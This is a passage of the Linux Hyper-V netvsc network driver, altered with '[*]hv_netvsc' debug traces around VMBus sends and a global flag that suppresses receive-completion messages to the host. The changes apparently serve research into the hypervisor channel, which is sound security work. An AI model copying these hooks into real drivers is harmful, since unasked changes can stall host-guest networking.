VM_PKT_DATA_INBAND, 0); 137 | /* If the failure is because the channel is rescinded; 138 | * ignore the failure since we cannot send on a rescinded 139 | * channel. This would allow us to properly cleanup 140 | * even when the channel is rescinded. 141 | */ 142 | if (device->channel->rescind) 143 | ret = 0; 144 | /* 145 | * If we failed here, we might as well return and 146 | * have a leak rather than continue and a bugchk 147 | */ 148 | if (ret != 0) { 149 | netdev_err(ndev, "unable to send " 150 | "revoke receive buffer to netvsp\n"); 151 | return; 152 | } 153 | net_device->recv_section_cnt = 0; 154 | } 155 | 156 | /* Teardown the gpadl on the vsp end */ 157 | if (net_device->recv_buf_gpadl_handle) { 158 | ret = vmbus_teardown_gpadl(device->channel, 159 | net_device->recv_buf_gpadl_handle); 160 | 161 | /* If we failed here, we might as well return and have a leak 162 | * rather than continue and a bugchk 163 | */ 164 | if (ret != 0) { 165 | netdev_err(ndev, 166 | "unable to teardown receive buffer's gpadl\n"); 167 | return; 168 | } 169 | net_device->recv_buf_gpadl_handle = 0; 170 | } 171 | 172 | if (net_device->recv_buf) { 173 | /* Free up the receive buffer */ 174 | vfree(net_device->recv_buf); 175 | net_device->recv_buf = NULL; 176 | } 177 | 178 | /* Deal with the send buffer we may have setup. 179 | * If we got a send section size, it means we received a 180 | * NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE msg (ie sent 181 | * NVSP_MSG1_TYPE_SEND_SEND_BUF msg) therefore, we need 182 | * to send a revoke msg here 183 | */ 184 | if (net_device->send_section_cnt) { 185 | /* Send the revoke receive buffer */ 186 | revoke_packet = &net_device->revoke_packet; 187 | memset(revoke_packet, 0, sizeof(struct nvsp_message)); 188 | 189 | revoke_packet->hdr.msg_type = 190 | NVSP_MSG1_TYPE_REVOKE_SEND_BUF; 191 | revoke_packet->msg.v1_msg.revoke_send_buf.id = 192 | NETVSC_SEND_BUFFER_ID; 193 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_REVOKE_SEND_BUF\n"); 194 | ret = vmbus_sendpacket(device->channel, 195 | revoke_packet, 196 | sizeof(struct nvsp_message), 197 | (unsigned long)revoke_packet, 198 | VM_PKT_DATA_INBAND, 0); 199 | 200 | /* If the failure is because the channel is rescinded; 201 | * ignore the failure since we cannot send on a rescinded 202 | * channel. This would allow us to properly cleanup 203 | * even when the channel is rescinded. 204 | */ 205 | if (device->channel->rescind) 206 | ret = 0; 207 | 208 | /* If we failed here, we might as well return and 209 | * have a leak rather than continue and a bugchk 210 | */ 211 | if (ret != 0) { 212 | netdev_err(ndev, "unable to send " 213 | "revoke send buffer to netvsp\n"); 214 | return; 215 | } 216 | net_device->send_section_cnt = 0; 217 | } 218 | /* Teardown the gpadl on the vsp end */ 219 | if (net_device->send_buf_gpadl_handle) { 220 | ret = vmbus_teardown_gpadl(device->channel, 221 | net_device->send_buf_gpadl_handle); 222 | 223 | /* If we failed here, we might as well return and have a leak 224 | * rather than continue and a bugchk 225 | */ 226 | if (ret != 0) { 227 | netdev_err(ndev, 228 | "unable to teardown send buffer's gpadl\n"); 229 | return; 230 | } 231 | net_device->send_buf_gpadl_handle = 0; 232 | } 233 | if (net_device->send_buf) { 234 | /* Free up the send buffer */ 235 | vfree(net_device->send_buf); 236 | net_device->send_buf = NULL; 237 | } 238 | kfree(net_device->send_section_map); 239 | } 240 | 241 | int netvsc_alloc_recv_comp_ring(struct netvsc_device *net_device, u32 q_idx) 242 | { 243 | struct netvsc_channel *nvchan = &net_device->chan_table[q_idx]; 244 | int node = cpu_to_node(nvchan->channel->target_cpu); 245 | size_t size; 246 | 247 | size = net_device->recv_completion_cnt * sizeof(struct recv_comp_data); 248 | nvchan->mrc.slots = vzalloc_node(size, node); 249 | if (!nvchan->mrc.slots) 250 | nvchan->mrc.slots = vzalloc(size); 251 | 252 | return nvchan->mrc.slots ? 0 : -ENOMEM; 253 | } 254 | 255 | static int netvsc_init_buf(struct hv_device *device, 256 | struct netvsc_device *net_device, 257 | const struct netvsc_device_info *device_info) 258 | { 259 | struct nvsp_1_message_send_receive_buffer_complete *resp; 260 | struct net_device *ndev = hv_get_drvdata(device); 261 | struct nvsp_message *init_packet; 262 | unsigned int buf_size; 263 | size_t map_words; 264 | int ret = 0; 265 | 266 | /* Get receive buffer area. */ 267 | buf_size = device_info->recv_sections * device_info->recv_section_size; 268 | buf_size = roundup(buf_size, PAGE_SIZE); 269 | 270 | net_device->recv_buf = vzalloc(buf_size); 271 | printk("[*]hv_netvsc:receive buffer page count:%d\n", (buf_size / PAGE_SIZE)); 272 | if (!net_device->recv_buf) { 273 | netdev_err(ndev, 274 | "unable to allocate receive buffer of size %u\n", 275 | buf_size); 276 | ret = -ENOMEM; 277 | goto cleanup; 278 | } 279 | 280 | /* 281 | * Establish the gpadl handle for this buffer on this 282 | * channel. Note: This call uses the vmbus connection rather 283 | * than the channel to establish the gpadl handle. 284 | */ 285 | ret = vmbus_establish_gpadl(device->channel, net_device->recv_buf, 286 | buf_size, 287 | &net_device->recv_buf_gpadl_handle); 288 | if (ret != 0) { 289 | netdev_err(ndev, 290 | "unable to establish receive buffer's gpadl\n"); 291 | goto cleanup; 292 | } 293 | 294 | /* Notify the NetVsp of the gpadl handle */ 295 | init_packet = &net_device->channel_init_pkt; 296 | memset(init_packet, 0, sizeof(struct nvsp_message)); 297 | init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_RECV_BUF; 298 | init_packet->msg.v1_msg.send_recv_buf. 299 | gpadl_handle = net_device->recv_buf_gpadl_handle; 300 | init_packet->msg.v1_msg. 301 | send_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 302 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RECV_BUF\n"); 303 | /* Send the gpadl notification request */ 304 | ret = vmbus_sendpacket(device->channel, init_packet, 305 | sizeof(struct nvsp_message), 306 | (unsigned long)init_packet, 307 | VM_PKT_DATA_INBAND, 308 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 309 | if (ret != 0) { 310 | netdev_err(ndev, 311 | "unable to send receive buffer's gpadl to netvsp\n"); 312 | goto cleanup; 313 | } 314 | 315 | wait_for_completion(&net_device->channel_init_wait); 316 | 317 | /* Check the response */ 318 | resp = &init_packet->msg.v1_msg.send_recv_buf_complete; 319 | if (resp->status != NVSP_STAT_SUCCESS) { 320 | netdev_err(ndev, 321 | "Unable to complete receive buffer initialization with NetVsp - status %d\n", 322 | resp->status); 323 | ret = -EINVAL; 324 | goto cleanup; 325 | } 326 | 327 | /* Parse the response */ 328 | netdev_dbg(ndev, "Receive sections: %u sub_allocs: size %u count: %u\n", 329 | resp->num_sections, resp->sections[0].sub_alloc_size, 330 | resp->sections[0].num_sub_allocs); 331 | 332 | /* There should only be one section for the entire receive buffer */ 333 | if (resp->num_sections != 1 || resp->sections[0].offset != 0) { 334 | ret = -EINVAL; 335 | goto cleanup; 336 | } 337 | 338 | net_device->recv_section_size = resp->sections[0].sub_alloc_size; 339 | net_device->recv_section_cnt = resp->sections[0].num_sub_allocs; 340 | 341 | /* Setup receive completion ring */ 342 | net_device->recv_completion_cnt 343 | = round_up(net_device->recv_section_cnt + 1, 344 | PAGE_SIZE / sizeof(u64)); 345 | ret = netvsc_alloc_recv_comp_ring(net_device, 0); 346 | if (ret) 347 | goto cleanup; 348 | 349 | /* Now setup the send buffer. */ 350 | buf_size = device_info->send_sections * device_info->send_section_size; 351 | buf_size = round_up(buf_size, PAGE_SIZE); 352 | 353 | net_device->send_buf = vzalloc(buf_size); 354 | if (!net_device->send_buf) { 355 | netdev_err(ndev, "unable to allocate send buffer of size %u\n", 356 | buf_size); 357 | ret = -ENOMEM; 358 | goto cleanup; 359 | } 360 | 361 | /* Establish the gpadl handle for this buffer on this 362 | * channel. Note: This call uses the vmbus connection rather 363 | * than the channel to establish the gpadl handle. 364 | */ 365 | ret = vmbus_establish_gpadl(device->channel, net_device->send_buf, 366 | buf_size, 367 | &net_device->send_buf_gpadl_handle); 368 | if (ret != 0) { 369 | netdev_err(ndev, 370 | "unable to establish send buffer's gpadl\n"); 371 | goto cleanup; 372 | } 373 | 374 | /* Notify the NetVsp of the gpadl handle */ 375 | init_packet = &net_device->channel_init_pkt; 376 | memset(init_packet, 0, sizeof(struct nvsp_message)); 377 | init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_SEND_BUF; 378 | init_packet->msg.v1_msg.send_send_buf.gpadl_handle = 379 | net_device->send_buf_gpadl_handle; 380 | init_packet->msg.v1_msg.send_send_buf.id = NETVSC_SEND_BUFFER_ID; 381 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_SEND_BUF\n"); 382 | /* Send the gpadl notification request */ 383 | ret = vmbus_sendpacket(device->channel, init_packet, 384 | sizeof(struct nvsp_message), 385 | (unsigned long)init_packet, 386 | VM_PKT_DATA_INBAND, 387 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 388 | if (ret != 0) { 389 | netdev_err(ndev, 390 | "unable to send send buffer's gpadl to netvsp\n"); 391 | goto cleanup; 392 | } 393 | 394 | wait_for_completion(&net_device->channel_init_wait); 395 | 396 | /* Check the response */ 397 | if (init_packet->msg.v1_msg. 398 | send_send_buf_complete.status != NVSP_STAT_SUCCESS) { 399 | netdev_err(ndev, "Unable to complete send buffer " 400 | "initialization with NetVsp - status %d\n", 401 | init_packet->msg.v1_msg. 402 | send_send_buf_complete.status); 403 | ret = -EINVAL; 404 | goto cleanup; 405 | } 406 | 407 | /* Parse the response */ 408 | net_device->send_section_size = init_packet->msg. 409 | v1_msg.send_send_buf_complete.section_size; 410 | 411 | /* Section count is simply the size divided by the section size. */ 412 | net_device->send_section_cnt = buf_size / net_device->send_section_size; 413 | 414 | netdev_dbg(ndev, "Send section size: %d, Section count:%d\n", 415 | net_device->send_section_size, net_device->send_section_cnt); 416 | 417 | /* Setup state for managing the send buffer. */ 418 | map_words = DIV_ROUND_UP(net_device->send_section_cnt, BITS_PER_LONG); 419 | 420 | net_device->send_section_map = kcalloc(map_words, sizeof(ulong), GFP_KERNEL); 421 | if (net_device->send_section_map == NULL) { 422 | ret = -ENOMEM; 423 | goto cleanup; 424 | } 425 | 426 | goto exit; 427 | 428 | cleanup: 429 | netvsc_destroy_buf(device); 430 | 431 | exit: 432 | return ret; 433 | } 434 | 435 | /* Negotiate NVSP protocol version */ 436 | static int negotiate_nvsp_ver(struct hv_device *device, 437 | struct netvsc_device *net_device, 438 | struct nvsp_message *init_packet, 439 | u32 nvsp_ver) 440 | { 441 | struct net_device *ndev = hv_get_drvdata(device); 442 | int ret; 443 | 444 | memset(init_packet, 0, sizeof(struct nvsp_message)); 445 | init_packet->hdr.msg_type = NVSP_MSG_TYPE_INIT; 446 | init_packet->msg.init_msg.init.min_protocol_ver = nvsp_ver; 447 | init_packet->msg.init_msg.init.max_protocol_ver = nvsp_ver; 448 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG_TYPE_INIT\n"); 449 | /* Send the init request */ 450 | ret = vmbus_sendpacket(device->channel, init_packet, 451 | sizeof(struct nvsp_message), 452 | (unsigned long)init_packet, 453 | VM_PKT_DATA_INBAND, 454 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 455 | 456 | if (ret != 0) 457 | return ret; 458 | 459 | wait_for_completion(&net_device->channel_init_wait); 460 | 461 | if (init_packet->msg.init_msg.init_complete.status != 462 | NVSP_STAT_SUCCESS) 463 | return -EINVAL; 464 | 465 | if (nvsp_ver == NVSP_PROTOCOL_VERSION_1) 466 | return 0; 467 | 468 | /* NVSPv2 or later: Send NDIS config */ 469 | memset(init_packet, 0, sizeof(struct nvsp_message)); 470 | init_packet->hdr.msg_type = NVSP_MSG2_TYPE_SEND_NDIS_CONFIG; 471 | init_packet->msg.v2_msg.send_ndis_config.mtu = ndev->mtu + ETH_HLEN; 472 | init_packet->msg.v2_msg.send_ndis_config.capability.ieee8021q = 1; 473 | 474 | if (nvsp_ver >= NVSP_PROTOCOL_VERSION_5) { 475 | init_packet->msg.v2_msg.send_ndis_config.capability.sriov = 1; 476 | 477 | /* Teaming bit is needed to receive link speed updates */ 478 | init_packet->msg.v2_msg.send_ndis_config.capability.teaming = 1; 479 | } 480 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG2_TYPE_SEND_NDIS_CONFIG\n"); 481 | ret = vmbus_sendpacket(device->channel, init_packet, 482 | sizeof(struct nvsp_message), 483 | (unsigned long)init_packet, 484 | VM_PKT_DATA_INBAND, 0); 485 | 486 | return ret; 487 | } 488 | 489 | static int netvsc_connect_vsp(struct hv_device *device, 490 | struct netvsc_device *net_device, 491 | const struct netvsc_device_info *device_info) 492 | { 493 | const u32 ver_list[] = { 494 | NVSP_PROTOCOL_VERSION_1, NVSP_PROTOCOL_VERSION_2, 495 | NVSP_PROTOCOL_VERSION_4, NVSP_PROTOCOL_VERSION_5 496 | }; 497 | struct nvsp_message *init_packet; 498 | int ndis_version, i, ret; 499 | 500 | init_packet = &net_device->channel_init_pkt; 501 | 502 | /* Negotiate the latest NVSP protocol supported */ 503 | for (i = ARRAY_SIZE(ver_list) - 1; i >= 0; i--) 504 | if (negotiate_nvsp_ver(device, net_device, init_packet, 505 | ver_list[i]) == 0) { 506 | net_device->nvsp_version = ver_list[i]; 507 | break; 508 | } 509 | 510 | if (i < 0) { 511 | ret = -EPROTO; 512 | goto cleanup; 513 | } 514 | 515 | pr_debug("Negotiated NVSP version:%x\n", net_device->nvsp_version); 516 | 517 | /* Send the ndis version */ 518 | memset(init_packet, 0, sizeof(struct nvsp_message)); 519 | 520 | if (net_device->nvsp_version <= NVSP_PROTOCOL_VERSION_4) 521 | ndis_version = 0x00060001; 522 | else 523 | ndis_version = 0x0006001e; 524 | 525 | init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_NDIS_VER; 526 | init_packet->msg.v1_msg. 527 | send_ndis_ver.ndis_major_ver = 528 | (ndis_version & 0xFFFF0000) >> 16; 529 | init_packet->msg.v1_msg. 530 | send_ndis_ver.ndis_minor_ver = 531 | ndis_version & 0xFFFF; 532 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_NDIS_VER\n"); 533 | /* Send the init request */ 534 | ret = vmbus_sendpacket(device->channel, init_packet, 535 | sizeof(struct nvsp_message), 536 | (unsigned long)init_packet, 537 | VM_PKT_DATA_INBAND, 0); 538 | if (ret != 0) 539 | goto cleanup; 540 | 541 | 542 | ret = netvsc_init_buf(device, net_device, device_info); 543 | 544 | cleanup: 545 | return ret; 546 | } 547 | 548 | static void netvsc_disconnect_vsp(struct hv_device *device) 549 | { 550 | netvsc_destroy_buf(device); 551 | } 552 | 553 | /* 554 | * netvsc_device_remove - Callback when the root bus device is removed 555 | */ 556 | void netvsc_device_remove(struct hv_device *device) 557 | { 558 | struct net_device *ndev = hv_get_drvdata(device); 559 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 560 | struct netvsc_device *net_device 561 | = rtnl_dereference(net_device_ctx->nvdev); 562 | int i; 563 | 564 | cancel_work_sync(&net_device->subchan_work); 565 | 566 | netvsc_disconnect_vsp(device); 567 | 568 | RCU_INIT_POINTER(net_device_ctx->nvdev, NULL); 569 | 570 | /* 571 | * At this point, no one should be accessing net_device 572 | * except in here 573 | */ 574 | netdev_dbg(ndev, "net device safe to remove\n"); 575 | 576 | /* Now, we can close the channel safely */ 577 | vmbus_close(device->channel); 578 | 579 | /* And dissassociate NAPI context from device */ 580 | for (i = 0; i < net_device->num_chn; i++) 581 | netif_napi_del(&net_device->chan_table[i].napi); 582 | 583 | /* Release all resources */ 584 | free_netvsc_device_rcu(net_device); 585 | } 586 | 587 | #define RING_AVAIL_PERCENT_HIWATER 20 588 | #define RING_AVAIL_PERCENT_LOWATER 10 589 | 590 | /* 591 | * Get the percentage of available bytes to write in the ring. 592 | * The return value is in range from 0 to 100. 593 | */ 594 | static inline u32 hv_ringbuf_avail_percent( 595 | struct hv_ring_buffer_info *ring_info) 596 | { 597 | u32 avail_read, avail_write; 598 | 599 | hv_get_ringbuffer_availbytes(ring_info, &avail_read, &avail_write); 600 | 601 | return avail_write * 100 / ring_info->ring_datasize; 602 | } 603 | 604 | static inline void netvsc_free_send_slot(struct netvsc_device *net_device, 605 | u32 index) 606 | { 607 | sync_change_bit(index, net_device->send_section_map); 608 | } 609 | 610 | static void netvsc_send_tx_complete(struct netvsc_device *net_device, 611 | struct vmbus_channel *incoming_channel, 612 | struct hv_device *device, 613 | const struct vmpacket_descriptor *desc, 614 | int budget) 615 | { 616 | struct sk_buff *skb = (struct sk_buff *)(unsigned long)desc->trans_id; 617 | struct net_device *ndev = hv_get_drvdata(device); 618 | struct vmbus_channel *channel = device->channel; 619 | u16 q_idx = 0; 620 | int queue_sends; 621 | 622 | /* Notify the layer above us */ 623 | if (likely(skb)) { 624 | const struct hv_netvsc_packet *packet 625 | = (struct hv_netvsc_packet *)skb->cb; 626 | u32 send_index = packet->send_buf_index; 627 | struct netvsc_stats *tx_stats; 628 | 629 | if (send_index != NETVSC_INVALID_INDEX) 630 | netvsc_free_send_slot(net_device, send_index); 631 | q_idx = packet->q_idx; 632 | channel = incoming_channel; 633 | 634 | tx_stats = &net_device->chan_table[q_idx].tx_stats; 635 | 636 | u64_stats_update_begin(&tx_stats->syncp); 637 | tx_stats->packets += packet->total_packets; 638 | tx_stats->bytes += packet->total_bytes; 639 | u64_stats_update_end(&tx_stats->syncp); 640 | 641 | napi_consume_skb(skb, budget); 642 | } 643 | 644 | queue_sends = 645 | atomic_dec_return(&net_device->chan_table[q_idx].queue_sends); 646 | 647 | if (net_device->destroy && queue_sends == 0) 648 | wake_up(&net_device->wait_drain); 649 | 650 | if (netif_tx_queue_stopped(netdev_get_tx_queue(ndev, q_idx)) && 651 | (hv_ringbuf_avail_percent(&channel->outbound) > RING_AVAIL_PERCENT_HIWATER || 652 | queue_sends < 1)) 653 | netif_tx_wake_queue(netdev_get_tx_queue(ndev, q_idx)); 654 | } 655 | 656 | static void netvsc_send_completion(struct netvsc_device *net_device, 657 | struct vmbus_channel *incoming_channel, 658 | struct hv_device *device, 659 | const struct vmpacket_descriptor *desc, 660 | int budget) 661 | { 662 | struct nvsp_message *nvsp_packet = hv_pkt_data(desc); 663 | struct net_device *ndev = hv_get_drvdata(device); 664 | 665 | switch (nvsp_packet->hdr.msg_type) { 666 | case NVSP_MSG_TYPE_INIT_COMPLETE: 667 | case NVSP_MSG1_TYPE_SEND_RECV_BUF_COMPLETE: 668 | case NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE: 669 | case NVSP_MSG5_TYPE_SUBCHANNEL: 670 | /* Copy the response back */ 671 | memcpy(&net_device->channel_init_pkt, nvsp_packet, 672 | sizeof(struct nvsp_message)); 673 | complete(&net_device->channel_init_wait); 674 | break; 675 | 676 | case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE: 677 | netvsc_send_tx_complete(net_device, incoming_channel, 678 | device, desc, budget); 679 | break; 680 | 681 | default: 682 | netdev_err(ndev, 683 | "Unknown send completion type %d received!!\n", 684 | nvsp_packet->hdr.msg_type); 685 | } 686 | } 687 | 688 | static u32 netvsc_get_next_send_section(struct netvsc_device *net_device) 689 | { 690 | unsigned long *map_addr = net_device->send_section_map; 691 | unsigned int i; 692 | 693 | for_each_clear_bit(i, map_addr, net_device->send_section_cnt) { 694 | if (sync_test_and_set_bit(i, map_addr) == 0) 695 | return i; 696 | } 697 | 698 | return NETVSC_INVALID_INDEX; 699 | } 700 | 701 | static u32 netvsc_copy_to_send_buf(struct netvsc_device *net_device, 702 | unsigned int section_index, 703 | u32 pend_size, 704 | struct hv_netvsc_packet *packet, 705 | struct rndis_message *rndis_msg, 706 | struct hv_page_buffer *pb, 707 | struct sk_buff *skb) 708 | { 709 | char *start = net_device->send_buf; 710 | char *dest = start + (section_index * net_device->send_section_size) 711 | + pend_size; 712 | int i; 713 | u32 msg_size = 0; 714 | u32 padding = 0; 715 | u32 remain = packet->total_data_buflen % net_device->pkt_align; 716 | u32 page_count = packet->cp_partial ? packet->rmsg_pgcnt : 717 | packet->page_buf_cnt; 718 | 719 | /* Add padding */ 720 | if (skb->xmit_more && remain && !packet->cp_partial) { 721 | padding = net_device->pkt_align - remain; 722 | rndis_msg->msg_len += padding; 723 | packet->total_data_buflen += padding; 724 | } 725 | 726 | for (i = 0; i < page_count; i++) { 727 | char *src = phys_to_virt(pb[i].pfn << PAGE_SHIFT); 728 | u32 offset = pb[i].offset; 729 | u32 len = pb[i].len; 730 | 731 | memcpy(dest, (src + offset), len); 732 | msg_size += len; 733 | dest += len; 734 | } 735 | 736 | if (padding) { 737 | memset(dest, 0, padding); 738 | msg_size += padding; 739 | } 740 | 741 | return msg_size; 742 | } 743 | 744 | static inline int netvsc_send_pkt( 745 | struct hv_device *device, 746 | struct hv_netvsc_packet *packet, 747 | struct netvsc_device *net_device, 748 | struct hv_page_buffer *pb, 749 | struct sk_buff *skb) 750 | { 751 | struct nvsp_message nvmsg; 752 | struct nvsp_1_message_send_rndis_packet * const rpkt = 753 | &nvmsg.msg.v1_msg.send_rndis_pkt; 754 | struct netvsc_channel * const nvchan = 755 | &net_device->chan_table[packet->q_idx]; 756 | struct vmbus_channel *out_channel = nvchan->channel; 757 | struct net_device *ndev = hv_get_drvdata(device); 758 | struct netdev_queue *txq = netdev_get_tx_queue(ndev, packet->q_idx); 759 | u64 req_id; 760 | int ret; 761 | u32 ring_avail = hv_ringbuf_avail_percent(&out_channel->outbound); 762 | printk("[*]hv_netvsc netvsc_send_pkt channel:0x%016x idx:%d\n", out_channel, packet->q_idx); 763 | nvmsg.hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT; 764 | if (skb) 765 | rpkt->channel_type = 0; /* 0 is RMC_DATA */ 766 | else 767 | rpkt->channel_type = 1; /* 1 is RMC_CONTROL */ 768 | 769 | rpkt->send_buf_section_index = packet->send_buf_index; 770 | if (packet->send_buf_index == NETVSC_INVALID_INDEX) 771 | rpkt->send_buf_section_size = 0; 772 | else 773 | rpkt->send_buf_section_size = packet->total_data_buflen; 774 | 775 | req_id = (ulong)skb; 776 | 777 | if (out_channel->rescind) 778 | return -ENODEV; 779 | 780 | if (packet->page_buf_cnt) { 781 | if (packet->cp_partial) 782 | pb += packet->rmsg_pgcnt; 783 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RNDIS_PKT\n"); 784 | ret = vmbus_sendpacket_pagebuffer(out_channel, 785 | pb, packet->page_buf_cnt, 786 | &nvmsg, sizeof(nvmsg), 787 | req_id); 788 | } else { 789 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RNDIS_PKT\n"); 790 | ret = vmbus_sendpacket(out_channel, 791 | &nvmsg, sizeof(nvmsg), 792 | req_id, VM_PKT_DATA_INBAND, 793 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 794 | } 795 | 796 | if (ret == 0) { 797 | atomic_inc_return(&nvchan->queue_sends); 798 | 799 | if (ring_avail < RING_AVAIL_PERCENT_LOWATER) 800 | netif_tx_stop_queue(txq); 801 | } else if (ret == -EAGAIN) { 802 | netif_tx_stop_queue(txq); 803 | if (atomic_read(&nvchan->queue_sends) < 1) { 804 | netif_tx_wake_queue(txq); 805 | ret = -ENOSPC; 806 | } 807 | } else { 808 | netdev_err(ndev, 809 | "Unable to send packet pages %u len %u, ret %d\n", 810 | packet->page_buf_cnt, packet->total_data_buflen, 811 | ret); 812 | } 813 | 814 | return ret; 815 | } 816 | 817 | /* Move packet out of multi send data (msd), and clear msd */ 818 | static inline void move_pkt_msd(struct hv_netvsc_packet **msd_send, 819 | struct sk_buff **msd_skb, 820 | struct multi_send_data *msdp) 821 | { 822 | *msd_skb = msdp->skb; 823 | *msd_send = msdp->pkt; 824 | msdp->skb = NULL; 825 | msdp->pkt = NULL; 826 | msdp->count = 0; 827 | } 828 | 829 | /* RCU already held by caller */ 830 | int netvsc_send(struct net_device_context *ndev_ctx, 831 | struct hv_netvsc_packet *packet, 832 | struct rndis_message *rndis_msg, 833 | struct hv_page_buffer *pb, 834 | struct sk_buff *skb) 835 | { 836 | struct netvsc_device *net_device 837 | = rcu_dereference_bh(ndev_ctx->nvdev); 838 | struct hv_device *device = ndev_ctx->device_ctx; 839 | int ret = 0; 840 | struct netvsc_channel *nvchan; 841 | u32 pktlen = packet->total_data_buflen, msd_len = 0; 842 | unsigned int section_index = NETVSC_INVALID_INDEX; 843 | struct multi_send_data *msdp; 844 | struct hv_netvsc_packet *msd_send = NULL, *cur_send = NULL; 845 | struct sk_buff *msd_skb = NULL; 846 | bool try_batch; 847 | bool xmit_more = (skb != NULL) ? skb->xmit_more : false; 848 | 849 | /* If device is rescinded, return error and packet will get dropped. */ 850 | if (unlikely(!net_device || net_device->destroy)) 851 | return -ENODEV; 852 | 853 | /* We may race with netvsc_connect_vsp()/netvsc_init_buf() and get 854 | * here before the negotiation with the host is finished and 855 | * send_section_map may not be allocated yet. 856 | */ 857 | if (unlikely(!net_device->send_section_map)) 858 | return -EAGAIN; 859 | 860 | nvchan = &net_device->chan_table[packet->q_idx]; 861 | packet->send_buf_index = NETVSC_INVALID_INDEX; 862 | packet->cp_partial = false; 863 | 864 | /* Send control message directly without accessing msd (Multi-Send 865 | * Data) field which may be changed during data packet processing. 866 | */ 867 | if (!skb) { 868 | cur_send = packet; 869 | goto send_now; 870 | } 871 | 872 | /* batch packets in send buffer if possible */ 873 | msdp = &nvchan->msd; 874 | if (msdp->pkt) 875 | msd_len = msdp->pkt->total_data_buflen; 876 | 877 | try_batch = msd_len > 0 && msdp->count < net_device->max_pkt; 878 | if (try_batch && msd_len + pktlen + net_device->pkt_align < 879 | net_device->send_section_size) { 880 | section_index = msdp->pkt->send_buf_index; 881 | 882 | } else if (try_batch && msd_len + packet->rmsg_size < 883 | net_device->send_section_size) { 884 | section_index = msdp->pkt->send_buf_index; 885 | packet->cp_partial = true; 886 | 887 | } else if (pktlen + net_device->pkt_align < 888 | net_device->send_section_size) { 889 | section_index = netvsc_get_next_send_section(net_device); 890 | if (unlikely(section_index == NETVSC_INVALID_INDEX)) { 891 | ++ndev_ctx->eth_stats.tx_send_full; 892 | } else { 893 | move_pkt_msd(&msd_send, &msd_skb, msdp); 894 | msd_len = 0; 895 | } 896 | } 897 | 898 | if (section_index != NETVSC_INVALID_INDEX) { 899 | netvsc_copy_to_send_buf(net_device, 900 | section_index, msd_len, 901 | packet, rndis_msg, pb, skb); 902 | 903 | packet->send_buf_index = section_index; 904 | 905 | if (packet->cp_partial) { 906 | packet->page_buf_cnt -= packet->rmsg_pgcnt; 907 | packet->total_data_buflen = msd_len + packet->rmsg_size; 908 | } else { 909 | packet->page_buf_cnt = 0; 910 | packet->total_data_buflen += msd_len; 911 | } 912 | 913 | if (msdp->pkt) { 914 | packet->total_packets += msdp->pkt->total_packets; 915 | packet->total_bytes += msdp->pkt->total_bytes; 916 | } 917 | 918 | if (msdp->skb) 919 | dev_consume_skb_any(msdp->skb); 920 | 921 | if (xmit_more && !packet->cp_partial) { 922 | msdp->skb = skb; 923 | msdp->pkt = packet; 924 | msdp->count++; 925 | } else { 926 | cur_send = packet; 927 | msdp->skb = NULL; 928 | msdp->pkt = NULL; 929 | msdp->count = 0; 930 | } 931 | } else { 932 | move_pkt_msd(&msd_send, &msd_skb, msdp); 933 | cur_send = packet; 934 | } 935 | 936 | if (msd_send) { 937 | int m_ret = netvsc_send_pkt(device, msd_send, net_device, 938 | NULL, msd_skb); 939 | 940 | if (m_ret != 0) { 941 | netvsc_free_send_slot(net_device, 942 | msd_send->send_buf_index); 943 | dev_kfree_skb_any(msd_skb); 944 | } 945 | } 946 | 947 | send_now: 948 | if (cur_send) 949 | ret = netvsc_send_pkt(device, cur_send, net_device, pb, skb); 950 | 951 | if (ret != 0 && section_index != NETVSC_INVALID_INDEX) 952 | netvsc_free_send_slot(net_device, section_index); 953 | 954 | return ret; 955 | } 956 | 957 | /* Send pending recv completions */ 958 | int send_recv_completions(struct net_device *ndev, 959 | struct netvsc_device *nvdev, 960 | struct netvsc_channel *nvchan) 961 | { 962 | struct multi_recv_comp *mrc = &nvchan->mrc; 963 | struct recv_comp_msg { 964 | struct nvsp_message_header hdr; 965 | u32 status; 966 | } __packed; 967 | struct recv_comp_msg msg = { 968 | .hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 969 | }; 970 | int ret; 971 | 972 | if(g_block_rndis_thread == true) 973 | { 974 | return 0; 975 | } 976 | 977 | while (mrc->first != mrc->next) { 978 | const struct recv_comp_data *rcd 979 | = mrc->slots + mrc->first; 980 | 981 | 982 | printk("[*]hv_netvsc send NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE(channel:0x%016x).\n", nvchan->channel); 983 | msg.status = rcd->status; 984 | ret = vmbus_sendpacket(nvchan->channel, &msg, sizeof(msg), 985 | rcd->tid, VM_PKT_COMP, 0); 986 | if (unlikely(ret)) { 987 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 988 | 989 | ++ndev_ctx->eth_stats.rx_comp_busy; 990 | return ret; 991 | } 992 | 993 | if (++mrc->first == nvdev->recv_completion_cnt) 994 | mrc->first = 0; 995 | } 996 | 997 | /* receive completion ring has been emptied */ 998 | if (unlikely(nvdev->destroy)) 999 | wake_up(&nvdev->wait_drain); 1000 | 1001 | return 0; 1002 | } 1003 | 1004 | /* Count how many receive completions are outstanding */ 1005 | static void recv_comp_slot_avail(const struct netvsc_device *nvdev, 1006 | const struct multi_recv_comp *mrc, 